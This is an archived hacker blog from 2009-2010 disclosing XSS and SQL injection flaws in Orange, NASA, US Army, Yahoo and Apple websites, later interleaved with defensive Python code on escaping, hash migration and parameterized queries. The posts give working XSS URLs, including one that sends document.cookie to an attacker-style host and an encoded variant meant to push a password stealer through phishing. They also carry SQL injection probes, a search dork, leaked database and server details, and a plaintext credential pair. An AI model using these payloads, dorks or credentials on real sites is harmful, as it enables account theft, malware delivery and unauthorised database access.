Orange.co.uk Vulnerable to XSS and phishing

January 29th, 2010 TinKode

                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania

XSS – [Cross-Site Scripting]
Information:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…

More here: [ XSS ]

I just found an XSS vulnerability in the website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code, which may lead to cookie stealing.

Proof of Concept:

Link:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email="><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

c0de:

"><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

We can encode the malicious code in base64, hex, etc. in order to hide our intentions! :)

Another example for this vulnerability is phishing! :D

As everyone knows, there are programs called stealers which can steal all the saved passwords from your browser.

I picked an executable program (Winamp in our case) for a demonstration.

Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe

The malicious code:

"><iframe height="0" width="0" frameborder="0" src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe"></iframe>

Encoded in hex will become:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email=%22%3e%3c%69%66%72%61%6d%65%20%68%65%69%67%68%74%3d%22%30%22%20%77%69%64%74%68%3d%22%30%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%22%30%22%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%6f%77%6e%6c%6f%61%64%2e%6e%75%6c%6c%73%6f%66%74%2e%63%6f%6d%2f%77%69%6e%61%6d%70%2f%63%6c%69%65%6e%74%2f%77%69%6e%61%6d%70%35%35%37%32%5f%6c%69%74%65%5f%65%6e%2d%75%73%2e%65%78%65%22%3e%3c%2f%69%66%72%61%6d%65%3e

Replace the Winamp link with another one (e.g. a stealer) and you can trick a lot of people.

Note: This isn’t the only vulnerability which I found in orange.co.uk
#Tinkode
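The reflection bug described above, shown from the defender's side as an added example (this is not code from the original post or from Orange): the `email` parameter is reflected into the form unescaped, the hardened version escapes it after percent-decoding so a hex-encoded payload ends up just as inert as a plain one, and a log check decodes before matching for the same reason. The host names, log lines and function names are this example's own constructions.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample request in the shape of the reminder form on the page,
# with the payload percent-encoded as the post shows. Hosts are placeholders.
SAMPLE_URL = (
    "http://website.example/index.php?module=reminder&submode=sendpw&email="
    "%22%3e%3ciframe%20src%3d%22http%3a%2f%2fattacker.example%2fx.exe%22%3e%3c%2fiframe%3e"
)

# Constructed access-log lines (request line only) for the detection check below.
SAMPLE_LOG = [
    "GET /index.php?module=reminder&submode=sendpw&email=user%40example.com",
    "GET /index.php?module=reminder&submode=sendpw&email=%22%3e%3ciframe%20src%3dx%3e",
    "GET /index.php?module=reminder&email=%2522%253e%253cscript%253e",  # double-encoded
]

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
INJECTION_RE = re.compile(
    r"<\s*/?\s*(iframe|script|img|svg|object|embed|body)\b|javascript\s*:", re.I
)


def email_param(url: str) -> str:
    """Return the ``email`` query parameter as the server sees it (percent-decoded)."""
    return parse_qs(urlsplit(url).query).get("email", [""])[0]


def render_vulnerable(email: str) -> str:
    """Reflect the value into the form unescaped: the bug class in the post."""
    return f'<input type="text" name="email" value="{email}">'


def render_hardened(email: str) -> str:
    """Escape for an HTML attribute context after decoding, so a hex-encoded
    payload is neutralised exactly like a plain one."""
    return f'<input type="text" name="email" value="{html.escape(email, quote=True)}">'


def validate_email(email: str) -> bool:
    """Input validation as a second layer: a reminder form only needs real addresses."""
    return EMAIL_RE.match(email) is not None


def percent_decode_fully(value: str, max_rounds: int = 3) -> str:
    """Decode until stable so nested encodings (%2522 -> %22 -> ") are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_injection_lines(log_lines) -> list:
    """Return the log lines whose decoded query values carry HTML/JS injection markers."""
    flagged = []
    for line in log_lines:
        query = line.partition("?")[2]
        for raw in query.split("&"):
            _, _, value = raw.partition("=")
            if INJECTION_RE.search(percent_decode_fully(value)):
                flagged.append(line)
                break
    return flagged
```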

Posted in Other | 4 Comments »

IPB Full Disclosure Exploit [Python]

January 24th, 2010 TinKode

#! /usr/bin/env python3.1

################################################################
# 	         _____ _____  ____  (validator.php)            #
#	        |_   _|  __ \|  _ \                            #
#		  | | | |__) | |_) |                           #
# 		  | | |  ___/|  _ <                            #
# 	 	 _| |_| |    | |_) |                           #
#   		|_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################

Link: http://codepad.org/8tKot0Cr

You must have Python 3.1 for it to work!

Posted in Other | 12 Comments »

The Center for Aerosol Research NASA website security issues

January 22nd, 2010 TinKode

				 _   _           _____
				| \ | |   /\    / ____|  /\
				|  \| |  /  \  | (___   /  \
				| . ` | / /\ \  \___ \ / /\ \
				| |\  |/ ____ \ ____) / ____ \
				|_| \_/_/    \_\_____/_/    \_\
						#TinKode@Romania

            The Center for Aerosol Research at NASA's Goddard Space Flight Center

                                    

The Goddard Space Flight Center (GSFC) is a major NASA space research laboratory established on May 1, 1959 as NASA’s first space flight center. GSFC employs approximately 10,000 civil servants and contractors, and is located approximately 6.5 miles (10.5 km) northeast of Washington, D.C. in Greenbelt, Maryland, USA. GSFC, one of ten major NASA field centers, is named in recognition of Dr. Robert H. Goddard (1882-1945), the pioneer of modern rocket propulsion in the United States.

Vulnerable website: http://aerocenter.gsfc.nasa.gov

I want to say that it was very hard to make this injection.
The webserver had good protection but wasn’t fully secured.
This kind only works manually; you can’t do it with apps.

In this picture you can see the visible columns:

Main information:

#Version:5.0.82-log
#User:carwww@localhost
#Database:aerocenter
#Datadir:/var/mysql/

Here we can see all databases:

[1] information_schema
[2] aerocenter
[3] car
[4] test

In this screenshot are all tables from all databases:

I don’t know exactly which database the tables are from… so I think I have not split them very well.

Tables from “aerocenter” database:


Tables from “car” database:


Tables from “test” database:


Columns from all databases:

Here we have the same situation like with tables…


Admin accounts:


These hashes are md5() and they can be easily cracked.
Bye, TinKode! :)
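On the remark that the hashes are plain md5() and easily cracked, an added example (not code from the post or from the site) of how an application moves off that format: recognise the legacy 32-hex shape, verify it with a constant-time compare, and replace it with a salted PBKDF2 hash on the next successful login. The function names and the iteration count are this example's own choices.

```python
import base64
import hashlib
import hmac
import os
import re

MD5_HEX = re.compile(r"^[0-9a-f]{32}$", re.I)
# Iteration count kept modest so the example runs quickly; raise it in production.
PBKDF2_ITERATIONS = 100_000


def is_legacy_md5(stored: str) -> bool:
    """An unsalted MD5 digest is recognisable by its 32-hex-character shape,
    the format of the hashes listed in the post."""
    return MD5_HEX.match(stored) is not None


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, iterated hash: a leaked digest cannot be looked up in a precomputed table."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations, base64.b64encode(salt).decode(), base64.b64encode(dk).decode()
    )


def verify_password(password: str, stored: str) -> bool:
    """Accept both formats during migration; constant-time compare in both cases."""
    if is_legacy_md5(stored):
        digest = hashlib.md5(password.encode()).hexdigest()
        return hmac.compare_digest(digest, stored.lower())
    try:
        algo, iterations, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), base64.b64decode(salt_b64), int(iterations)
    )
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))


def verify_and_upgrade(password: str, stored: str) -> tuple:
    """Login path: on success against a legacy hash, return the replacement to store."""
    ok = verify_password(password, stored)
    if ok and is_legacy_md5(stored):
        return True, hash_password(password)
    return ok, stored


def audit_legacy_hashes(rows) -> list:
    """Given (username, stored_hash) rows, list the accounts still on unsalted MD5."""
    return [user for user, stored in rows if is_legacy_md5(stored)]
```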

Posted in MySQL Injection | 27 Comments »

vBulletin files / directories full disclosure (nulled)

January 20th, 2010 TinKode

*\-----------------------------------------------------------------------------/*
		       ____        _ _      _   _       (nulled)
		      |  _ \      | | |    | | (_)
		__   _| |_) |_   _| | | ___| |_ _ _ __
		\ \ / /  _ <| | | | | |/ _ \ __| | '_ \
		 \ V /| |_) | |_| | | |  __/ |_| | | | |
		  \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|
		                  Full disclosure... 

*\-----------------------------------------------------------------------------/* 

Name: vBulletin nulled (validator.php) files/directories disclosure
Author: TinKode
Date: 19-01-2010
Dork: "inurl:validator.php" 

*\-----------------------------------------------------------------------------/* 

Description: With this file you can see all files (.sql, .tar.gz, .zip, .rar, .php, anything)
/ directories from the folder where vBulletin is installed... 

*\-----------------------------------------------------------------------------/* 

Exploit: http://www.website.com/vB_forum/validator.php 

*\-----------------------------------------------------------------------------/* 

Note: Works on many nulled versions (maybe all) 

*\-----------------------------------------------------------------------------/* 

Copyrights: http://tinkode.baywords.com 

*\-----------------------------------------------------------------------------/* 

Greetz: http://www.insecurity.ro, http://www.darkc0de.com 

*\-----------------------------------------------------------------------------/*

#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################ 

Link: http://codepad.org/pEBTI2dU

You need Python 3.1 for it to work!

Posted in Other | 8 Comments »

US Army full disclosure again MSSQL injection

January 15th, 2010 TinKode

                                                                         _
                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/
                                              #full disclosure@c0de.breaker

#Information:
First Army was established on August 10, 1918 as a field army when sufficient American military manpower had arrived in France during World War I. As an element of the American Expeditionary Force (AEF) in the latter stages of World War I it was the first of three field armies established under the AEF. Serving in its ranks were many figures who later played important roles in World War II. First Army was inactivated in April 1919.

A short time ago I found a website vulnerable to MSSQL Injection (www.onestop.army.mil)… But today I tested another website, and in 2 minutes I found a vulnerable parameter.
Vulnerable link: www.first.army.mil

Testing:
and 1=1-- (True)

and 1=2-- (False)

Main Information:

#Version: Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
#User: Vacancyuser
#Principal Database: FirstArmyVacancies
#Server Name: GILL011C2PSQL02
#Server: Microsoft-IIS/6.0

Version:

All databases from webserver:


Tables from “fsweb” database:


Columns from the “POC” table:


I want to say, I didn’t extract anything from any database, like usernames, passwords, addresses, etc.

Posted in MSSQL Injection | 4 Comments »

Army.mil full disclosure

January 7th, 2010 TinKode

                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/                 

The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.

Vulnerable link: http://onestop.army.mil

This website is vulnerable to MSSQL Injection. With this vulnerability I can see / extract everything from the databases.

Testing:
and 1=1-- (True)

and 1=2-- (False)

Ok, in this picture we can see all the main information about the webserver.

Main information:

#Version: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
#User: Dynatouch
#Database: AHOS
#Host Name: AHSGSVDAHQIT130

All databases:


We can access information_schema, so let’s see the tables from the principal database “AHOS”:


Now, here are some interesting tables, like mgr_login_passwords.

Here I found user : password columns, with:

#Username: Dynatouch
#Password: AHOS

wtf! :|

That’s all! Bye, TinKode…

Posted in Blind SQL Injection | 11 Comments »

Yahoo Blind SQL Injection

January 1st, 2010 TinKode

__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania

Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.

Vulnerable website: http://hk.adspecs.yahoo.com

Testing…

and 1=1-- (True)

and 1=2-- (False)

In this picture we can see that SELECT works

Now we try to find the version:

#Version: 5.0.11.24

Ok, it’s normal until now, but we can have access to mysql.user (bad)

And some tables from mysql.user (default)

MySQL Database, Table: user
#user
#password

~TinKode

Posted in Blind SQL Injection | 13 Comments »

How to find XSS in NASA

December 29th, 2009 TinKode

__   __ _____ _____   _   _           _____
\ \ / // ____/ ____| | \ | |   /\    / ____|  /\
 \ V /| (___| (___   |  \| |  /  \  | (___   /  \
  > <  \___ \\___ \  | . ` | / /\ \  \___ \ / /\ \
 / . \ ____) |___) | | |\  |/ ____ \ ____) / ____ \
/_/ \_\_____/_____/  |_| \_/_/    \_\_____/_/    \_\

#How to find XSS in NASA?

Very simple. All you have to do is type inurl:”tinkode” into Google, and that’s it.

Link google:

http://www.google.ro/search?hl=ro&client=firefox-a&rls=org.mozilla:en-US:official&hs=6Pn&q=inurl:%22tinkode%22&start=40&sa=N

Link Nasa XSS:

http://winds.jpl.nasa.gov/imagesAnim/images.cfm?pageName=ImagesAnim&subPageName=QuikSCAT&Image=QS_S1B28872%22%3E%3Cscript%3Ealert%28/TinKode/%29%3C/script%3E

Yeah, this XSS is indexed on Google, LOL.

Another XSS in NASA:

1. http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

2. http://hitf.jsc.nasa.gov/hitfpub/redirect.cfm?location=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

3. http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=%22%3E%3Cscript%3Ealert(/c0de.breaker/)%3C/script%3E

4. http://nmp.jpl.nasa.gov/ds2/search/search.pl?Range=All&Format=Standard&Terms=1%3Cscript%3Ealert(document.cookie)%3C/script%3E

5. http://pims.grc.nasa.gov/calendars/qs_roadmap_index.php?year=”>alert(/c0de.breaker/)

6. http://starbeam.jpl.nasa.gov/tools/text-search/results.jsp?query=alert(document.cookie)

etc

Posted in Other | No Comments »

Apple.com Blind SQL Injection – TinKode

December 27th, 2009 TinKode

          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
		#BlindSQLi by TinKode

@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.

Yeah, so it’s a huge company, but it has low security. Sad.
This parameter can be found by anyone in only 5 min with Google.

Testing:

and 1=1-- (True)

and 1=2-- (false, and redirect)

Now let’s see the version

#Version: 5
#Databases: locator_asia, test

#Tables from “locator_asia” database


#Tables from “test” database

[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp

Columns from “reseller_city_utf8” table

[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4

A good thing is that there is nothing important to extract…
Great, goodbye, TinKode

Posted in Blind SQL Injection | 7 Comments »

Nasa vulnerable to MSSQL Injection

December 13th, 2009 TinKode

 _   _                   __  __  _____ _____  ____  _      _
| \ | |                 |  \/  |/ ____/ ____|/ __ \| |    (_)
|  \| | __ _ ___  __ _  | \  / | (___| (___ | |  | | |     _
| . ` |/ _` / __|/ _` | | |\/| |\___ \\___ \| |  | | |    | |
| |\  | (_| \__ \ (_| | | |  | |____) |___) | |__| | |____| |
|_| \_|\__,_|___/\__,_| |_|  |_|_____/_____/ \___\_\______|_|

			#Nasa vulnerable again (MSSQLi)@c0de.breaker

Hello, unfortunately I found another serious vulnerability in NASA, more precisely an MSSQL Injection.
I admit that this time it was harder to make the injection.
It is the fourth time this happens, but nothing can surprise me anymore. As always, I showed no interest in the content of the website.
I hope this is the last time I see these kinds of vulnerabilities.
Link: www.gltrs.grc.nasa.gov
Testing:

and 1=1-- (True)

and 1=2-- (False)

As you can see, this time I didn’t hide the vulnerable parameter, mainly because it can be easily found on Google with filetype:aspx.
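The `and 1=1-- / and 1=2--` test used here and in the Army, Yahoo and Apple posts above, shown from the defender's side as an added example (not code from any of the posts): a lookup built by string concatenation answers the two probes differently, the parameterized version does not, so the same probe doubles as a regression test, and a log check flags the pattern after percent-decoding. The table, log lines and function names are this example's own constructions; sqlite3 stands in for MySQL or MSSQL only because it ships with Python.

```python
import re
import sqlite3
from urllib.parse import unquote


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for a site's report lookup."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE report (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO report VALUES (?, ?)",
                    [(1, "Aerosol study"), (2, "Wind data")])
    return con


def lookup_vulnerable(con, report_id: str) -> list:
    """String concatenation: the input becomes part of the SQL text."""
    sql = f"SELECT title FROM report WHERE id = {report_id}"
    return [row[0] for row in con.execute(sql)]


def lookup_parameterized(con, report_id: str) -> list:
    """Bound parameter plus type check: the input is only ever data."""
    try:
        value = int(report_id)
    except ValueError:
        return []
    rows = con.execute("SELECT title FROM report WHERE id = ?", (value,))
    return [row[0] for row in rows]


def boolean_probe_differs(lookup, con, base_id: str) -> bool:
    """The 'and 1=1-- / and 1=2--' check from the posts, reused as a regression
    test: a vulnerable lookup answers the two probes differently, a fixed one
    answers them identically (both probes are simply rejected)."""
    true_probe = lookup(con, f"{base_id} and 1=1--")
    false_probe = lookup(con, f"{base_id} and 1=2--")
    return true_probe != false_probe


# Constructed access-log lines (request line only) for the detection side.
SAMPLE_LOG = [
    "GET /report.aspx?id=7",
    "GET /report.aspx?id=7%20and%201%3D1--",
    "GET /report.aspx?id=7%20and%201%3D2--",
    "GET /report.aspx?id=7%27%20AND%20%271%27%3D%271",
]
PROBE_RE = re.compile(r"\b(and|or)\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I)


def flag_probe_lines(log_lines) -> list:
    """Flag requests whose decoded query string carries a boolean-probe pattern."""
    return [line for line in log_lines
            if PROBE_RE.search(unquote(line.partition("?")[2]))]
```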

Main Information:

#Version: Microsoft SQL Server
#Operating system: Windows
#Web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.7
#Main Database: RDP
#Current User: RDP_Ext_RA

Tables from main database “RDP”:

#Abstract
#Author
#AuthorTypeLookup
#RDPLibrary
#RDPTemp
#ReportTemplateLookup
#ReportTypeLookup
#RptTempDistLookup
#RDP

All databases (92):


As a last remark:
I hope my findings aren’t all for nothing, and that NASA will do a complete inspection on all their websites.

Posted in MSSQL Injection | 5 Comments »